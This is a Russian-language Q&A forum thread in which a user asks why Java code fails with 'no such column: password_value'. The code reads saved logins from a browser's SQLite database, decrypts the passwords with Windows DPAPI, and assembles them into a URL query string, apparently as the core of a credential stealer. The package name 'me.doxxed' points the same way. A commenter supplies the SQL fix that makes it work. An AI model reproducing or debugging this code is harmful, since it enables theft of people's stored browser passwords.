# java.sql.SQLException: no such column: 'password_value'

Tags: java, sqlite

Код

```
Class.forName("org.sqlite.JDBC");
Connection connection;
connection = DriverManager.getConnection("jdbc:sqlite:"+_final.getAbsolutePath());
PreparedStatement s = connection.prepareStatement(
        "SELECT 'origin_url', 'username_value', 'password_value' from 'logins'");
ResultSet re = s.executeQuery();
while (re.next())
{
    byte[] b = (byte[]) re.getBytes("password_value");
    byte[] newB = Crypt32Util.cryptUnprotectData(b);

    String pass = new String(newB);
    String query_url =
            "?url="+re.getString("origin_url")+"&username="+re.getString("username_value")+"&pass="+pass;

    System.out.println(query_url);
}
```

```
java.sql.SQLException: no such column: 'password_value'
    at org.sqlite.jdbc3.JDBC3ResultSet.findColumn(JDBC3ResultSet.java:48)
    at org.sqlite.jdbc3.JDBC3ResultSet.getBytes(JDBC3ResultSet.java:266)
    at me.doxxed.br.ps(br.java:40)
    at me.doxxed.util.main(util.java:51)
    at me.doxxed.Main.main(Main.java:29)
```

скрин из таблицы logins
https://i.stack.imgur.com/6oAk3.png

Comment: Описание какое-то будет?
Скрин из бд, что мол вот такая колонка есть в БД

Comment: да, могу приложить, секунду

Comment: приложил скриншот @ДмитрийАлексеенко

Comment: `"SELECT 'origin_url', 'username_value', 'password_value' from 'logins'"` замени на `"SELECT origin_url, username_value, password_value from logins"`

Comment: @ДмитрийАлексеенко новая ошибка

Comment: вот паста https://pastebin.com/Rh961qS0

Comment: Не может найти какой-то класс это уже не SQL запроса ошибка